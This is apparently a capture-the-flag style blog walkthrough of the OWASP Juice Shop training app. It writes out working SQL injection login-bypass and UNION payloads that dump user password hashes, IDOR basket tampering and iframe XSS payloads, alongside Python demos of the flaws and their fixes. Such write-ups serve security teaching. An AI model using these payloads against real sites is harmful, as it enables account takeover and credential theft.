OWASP Juice Shop website intrusion example (a classic web intrusion walkthrough) - 泓源视野

[Task 1] Connect To Our Network

[Task 2] Configure Burp (If you haven’t already)

[Task 3] Walk through the application
1. Create an account
2. Click on the links to see what the application does (and to identify the attack surface, i.e. which parts of the application have functionality you can attack)
3. Use the different functionality (e.g. making transactions)

Steps:
1. Discover the web application's functionality to find the attack surface.

[Illustration]

2. View the page's source

[Illustration 1]
There's a YouTube link.

3. Follow the YouTube link → nothing, just for fun.

[Illustration 2]

4. Create an account

5. Click "Not yet a customer?"

[Illustration 3]

6. User registration
→ Email: [email protected]
→ Password: 12345
→ Answer to the security question: 12345

[Illustration 4]

7. Try to log in with the created account → the login form is a candidate for SQL injection

[Illustration 5]

8. Try changing the password

[Illustration 6]

9. Enter the required data → it is very easy to change a password.

[Illustration 7]

10. Try to buy something and check out

[Illustration 8]

11. There's an ftp path.

[Illustration 9]

12. Follow the ftp path → the /ftp directory is browsable and lists its files (sensitive data exposure)

[Illustration 10]

13. About us
Click on the green text.

[Illustration 11]

14. There's a "legal.md" file, which is located in the ftp path.

[Illustration 12]

15. Contact us
Click on "Complain?"

[Illustration 13]

16. Try uploading some text files. It seems only PDF files are allowed.

[Illustration 14]

17. Upload test.pdf

[Illustration 15]

18. The upload succeeds → the complaint form accepts file uploads, which is more attack surface; whether the PDF-only restriction is enforced server-side is worth checking with Burp rather than trusting the form.

[Illustration 16]

Conclusion:

The things I discovered so far:
1. The site was developed using JavaScript.
2. SQL injection (login form)
3. Passwords are easily changed
4. Exposure of data (browsable /ftp directory)
5. File upload (complaint form)


[Task 4] Injection
Log in with the administrator's user account using SQL injection

1. Try to inject the login page
[Illustration 17]

2. Try SQL injection in the email field, with any value (here "test") as the password

username '
password test
→ database error: the unbalanced quote breaks the query, which confirms the field is injectable
[Illustration 18]
username ' or 1=1
password test
→ still an error: the quote that opens the password comparison is left unbalanced
[Illustration 19]
username ' or 1=1--
password test
→ the -- comments out the rest of the WHERE clause, including the password check

Success!!!

[Illustration 20]

It seems we logged in with the admin account: "or 1=1" matches every row of the Users table, and the first row returned is the administrator's.

[Illustration 21]

Admin email is [email protected]
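As an added example (not code from this page or from Juice Shop itself), the following Python script reproduces the shape of that login query against an in-memory SQLite table of constructed users and runs the three payloads above, first against the string-concatenated query and then against a parameterized one. The emails, passwords and table layout are assumptions for illustration; hashing the password with MD5 before the comparison mirrors what Juice Shop does.

```python
import hashlib
import sqlite3

# Constructed stand-in for Juice Shop's Users table (emails, passwords and
# columns are assumptions for this example). Juice Shop really does store
# MD5 password hashes, and the administrator is the first row in the table.
USERS = [
    ("admin@example.test", hashlib.md5(b"admin123").hexdigest(), "admin"),
    ("jim@example.test", hashlib.md5(b"ncc-1701").hexdigest(), "customer"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO Users (email, password, role) VALUES (?, ?, ?)", USERS
    )
    return conn


def build_login_sql(email, password):
    """Vulnerable shape: request fields concatenated straight into the SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return (
        f"SELECT email, role FROM Users WHERE email = '{email}' "
        f"AND password = '{pw_hash}'"
    )


def login_vulnerable(conn, email, password):
    """Returns ("ok", row), ("denied", None) or ("error", message)."""
    try:
        row = conn.execute(build_login_sql(email, password)).fetchone()
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("ok", row) if row else ("denied", None)


def login_safe(conn, email, password):
    """Fixed form: bound parameters, so input can never change the query structure."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT email, role FROM Users WHERE email = ? AND password = ?",
        (email, pw_hash),
    ).fetchone()
    return ("ok", row) if row else ("denied", None)


if __name__ == "__main__":
    db = make_db()
    for payload in ["'", "' or 1=1", "' or 1=1--"]:
        print(repr(payload), "->", login_vulnerable(db, payload, "test"))
    print("same payload, parameterized ->", login_safe(db, "' or 1=1--", "test"))
```

The first two payloads raise a SQLite syntax error (the unbalanced quote), the third returns the admin row because the comment removes the password check; the parameterized query treats the same string as a literal email and denies the login.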


[Task 5] Broken Authentication

  • Reset Jim's password using the forgotten password mechanism — what was the answer to the secret question?
  • What is the administrator password?
  1. We need to find Jim's credentials.
  2. I noticed there is a search function, but injecting through the search box in the UI did not work.
[Illustration 22]

3. After inspecting with the browser's Network panel and reloading, the request behind the search is http://10.10.112.196/rest/product/search?q=

[Illustration 23]

4. Injection
Use the '))-- pattern together with UNION: the two closing parentheses balance the brackets the search query wraps around its LIKE conditions, and -- comments out the rest of the query.

http://10.10.112.196/rest/product/search?q='
[Illustration 24]
http://10.10.112.196/rest/product/search?q='))--
[Illustration 25]
http://10.10.112.196/rest/product/search?q=')) union select * from x--
[Illustration 26]

Find the correct number of columns by adding one value at a time until the UNION stops failing:

http://10.10.112.196/rest/product/search?q=lalaland')) union select 1--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,7--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,7,8--

Success!! (eight columns)

[Illustration 27]

5. Enumerate the database

http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,7,sqlite_version()--
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,8 from sqlite_master-- → does not work (only seven values, so the column count no longer matches)
http://10.10.112.196/rest/product/search?q=lalaland')) union select 1,2,3,4,5,6,email,password from Users--

Now we have every account's password hash.

[Illustration 28]

Crack the admin's hash with CrackStation (https://crackstation.net/)

[Illustration 29]

The admin's password is admin123

[Illustration 30]
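An added example, not code from this page or from Juice Shop: a Python model of the search query over an in-memory SQLite database, with the column-count discovery loop, the Users dump through the last two result columns, and an offline wordlist check standing in for CrackStation. The product row, the user rows and the eight-column Products layout are constructed for illustration; the MD5 password hashes mirror what Juice Shop stores.

```python
import hashlib
import sqlite3

# Constructed stand-in tables (Juice Shop's real seed data is not used).
# Products has eight columns, matching the count found above; Users keeps
# MD5 password hashes as Juice Shop does.
USERS = [
    ("admin@example.test", hashlib.md5(b"admin123").hexdigest()),
    ("jim@example.test", hashlib.md5(b"ncc-1701").hexdigest()),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT, description TEXT, "
        "price REAL, image TEXT, createdAt TEXT, updatedAt TEXT, deletedAt TEXT)"
    )
    conn.execute(
        "INSERT INTO Products (name, description, price, image, createdAt, updatedAt) "
        "VALUES ('Apple Juice', 'Fresh and tasty', 1.99, 'apple.jpg', '2020-01-01', '2020-01-01')"
    )
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users (email, password) VALUES (?, ?)", USERS)
    return conn


def search(conn, q):
    """Shape of the query behind /rest/product/search?q=: q is concatenated in."""
    sql = (
        "SELECT * FROM Products WHERE ((name LIKE '%" + q + "%' "
        "OR description LIKE '%" + q + "%') AND deletedAt IS NULL) ORDER BY name"
    )
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def find_column_count(conn, max_cols=16):
    """Grow 'union select 1,2,...' until SQLite stops rejecting the column count."""
    for n in range(1, max_cols + 1):
        values = ",".join(str(i) for i in range(1, n + 1))
        status, _ = search(conn, f"lalaland')) union select {values}--")
        if status == "ok":
            return n
    return None


def dump_users(conn, ncols):
    """Pull email and password hash through the last two columns of the result."""
    padding = ",".join(str(i) for i in range(1, ncols - 1))
    status, rows = search(conn, f"lalaland')) union select {padding},email,password from Users--")
    if status != "ok":
        raise RuntimeError(rows)
    # 'lalaland' matches no product, so every row comes from the injected SELECT
    return [(row[-2], row[-1]) for row in rows]


def crack_md5(hex_digest, wordlist):
    """Offline stand-in for CrackStation: hash each candidate and compare."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == hex_digest:
            return word
    return None


if __name__ == "__main__":
    db = make_db()
    n = find_column_count(db)
    print("columns:", n)
    creds = dict(dump_users(db, n))
    print("admin hash:", creds["admin@example.test"])
    print("cracked:", crack_md5(creds["admin@example.test"], ["password", "123456", "admin123"]))
```

The seven-value sqlite_master probe from step 5 fails here for the same reason it failed on the target: a UNION needs the same number of columns on both sides.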

6. I still can't reset Jim's password. Let's try another way.

7. View the site with Chrome's Sources panel

[Illustration 31]

8. Inspect main.js and search for "admin"

[Illustration 32]

9. Try http://10.10.112.196/#/administration

[Illustration 33]

There's a recycling request related to

[Illustration 34]

10. Try to reset Jim's password

[Illustration 35]
[Illustration 36]

11. Jim lives at "Starfleet HQ, 24–593 Federation Drive, San Francisco, CA" → probably a Star Trek hint

12. Let's try Star Trek character names. Start by searching for James T. Kirk and opening the Wikipedia article.

[Illustration 37]

13. Try resetting with "Tiberius" or "tiberius" → failed

14. Try resetting with "Samuel"

[Illustration 38]
[Illustration 39]

[Task 6] Sensitive Data Exposure

  • Access a confidential document and enter the name of the first file with the extension ".md"
  1. Access http://10.10.230.0/ftp/
  2. Download and open "acquisitions.md"
[Illustration 40]
[Illustration 41]
[Illustration 42]

[Task 7] Broken Access Control

  • Access the administration section of the store — what is the name of the page?
  • Access someone else's basket
  • Get rid of all 5-star customer feedback
  1. I already accessed the administration page
[Illustration 33]
[Illustration 43]

2. Access the basket page

3. Inspect with Chrome's Application panel

4. In Session Storage, edit bid (the basket id the frontend sends to the server; the server returns whichever basket that id names without checking that it belongs to the logged-in user)

[Illustration 44]

5. Reload the page

[Illustration 45]

6. Back on the administration page, delete the 5-star feedback

[Illustration 46]
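An added example, not Juice Shop's code: a Python model of the basket lookup showing why an id taken from sessionStorage must be checked against the authenticated user on the server, plus a small probe of the kind a tester would run to list which baskets a given user can read. The basket store, owners and user ids are constructed for this example.

```python
# Constructed basket store standing in for Juice Shop's Baskets table
# (ids, owners and contents are assumptions for this example).
BASKETS = {
    1: {"UserId": 1, "items": ["Apple Juice"]},
    2: {"UserId": 2, "items": ["Banana Juice", "Lemon Juice"]},
    3: {"UserId": 3, "items": []},
}


class Forbidden(Exception):
    """Raised when a caller asks for a basket that is not theirs."""


def get_basket_vulnerable(bid, session_user_id):
    """Mirrors the flaw: the client-chosen bid is looked up and returned as-is.
    session_user_id (taken from the auth token) is never compared with the owner."""
    basket = BASKETS.get(bid)
    return None if basket is None else basket["items"]


def get_basket_fixed(bid, session_user_id):
    """Ownership check on the server: the id from sessionStorage is untrusted input."""
    basket = BASKETS.get(bid)
    if basket is None:
        return None
    if basket["UserId"] != session_user_id:
        raise Forbidden(f"basket {bid} does not belong to user {session_user_id}")
    return basket["items"]


def probe_idor(handler, session_user_id, candidate_bids):
    """Pentest-style check: which baskets can this user read that are not theirs?
    Returns the list of leaked basket ids (empty means no IDOR found)."""
    leaked = []
    for bid in candidate_bids:
        try:
            items = handler(bid, session_user_id)
        except Forbidden:
            continue
        if items is not None and BASKETS[bid]["UserId"] != session_user_id:
            leaked.append(bid)
    return leaked


if __name__ == "__main__":
    print("vulnerable handler leaks:", probe_idor(get_basket_vulnerable, 1, range(1, 5)))
    print("fixed handler leaks:", probe_idor(get_basket_fixed, 1, range(1, 5)))
```

The probe is the same walk a tester does by hand when editing bid and reloading, only over every candidate id; an empty result from the fixed handler is what the endpoint should produce for any authenticated user.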

[Task 8] Cross Site Scripting (XSS)

  • Carry out reflected XSS using Track Orders
  • Carry out XSS using the Search field
  1. Go into Track Orders
[Illustration 47]
[Illustration 48]

2. Try entering some numbers

[Illustration 49]

3. Put <iframe src="javascript:alert('xss')"> in the request

http://10.10.52.41/#/track-result?id=<iframe src="javascript:alert('xss')">
[Illustration 50]

4. Put <iframe src="javascript:alert('xss')"> in the search function

http://10.10.52.41/#/search?q=<iframe src="javascript:alert('xss')">
[Illustration 51]
[Illustration 52]
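An added example, not code from this page or from Juice Shop: Python functions that write the order id into the page two ways, a tag blacklist that only removes script elements versus HTML escaping, and a parser-based check of which elements end up live in the output. It shows why the iframe payload above gets past a blacklist: there is no script tag to strip, the browser creates the iframe, and its javascript: URL runs. The template markup around the value is an assumption.

```python
import html
import re
from html.parser import HTMLParser

# The payload used above
PAYLOAD = "<iframe src=\"javascript:alert('xss')\">"


def render_blacklist(order_id):
    """Naive fix that only strips <script> elements. The template markup is an
    assumption; the point is that the value is written into HTML unescaped."""
    cleaned = re.sub(r"(?is)<script\b.*?>.*?</script>", "", order_id)
    return f"<p>Tracking order {cleaned}</p>"


def render_escaped(order_id):
    """Correct fix for this context: encode the value as HTML text."""
    return f"<p>Tracking order {html.escape(order_id, quote=True)}</p>"


class TagCollector(HTMLParser):
    """Records every element the browser would actually create, and any
    attribute whose value is a javascript: URL."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.js_urls = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if value and value.strip().lower().startswith("javascript:"):
                self.js_urls.append((tag, name))


def live_markup(fragment):
    """Return (tags, javascript-URL attributes) that survive in the rendered HTML."""
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags, collector.js_urls


if __name__ == "__main__":
    for renderer in (render_blacklist, render_escaped):
        out = renderer(PAYLOAD)
        print(renderer.__name__, "->", out)
        print("   live:", live_markup(out))
```

The blacklist looks effective against <script>alert(1)</script> and fails against the iframe; escaping leaves only the template's own <p> element in both cases, because the angle brackets and quotes become text rather than markup.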

A classic web intrusion case

This article was published by admin of 泓源视野, and its copyright belongs to 泓源视野. The content reflects the author's personal views and does not represent the views of 泓源视野. Please credit the source when reposting.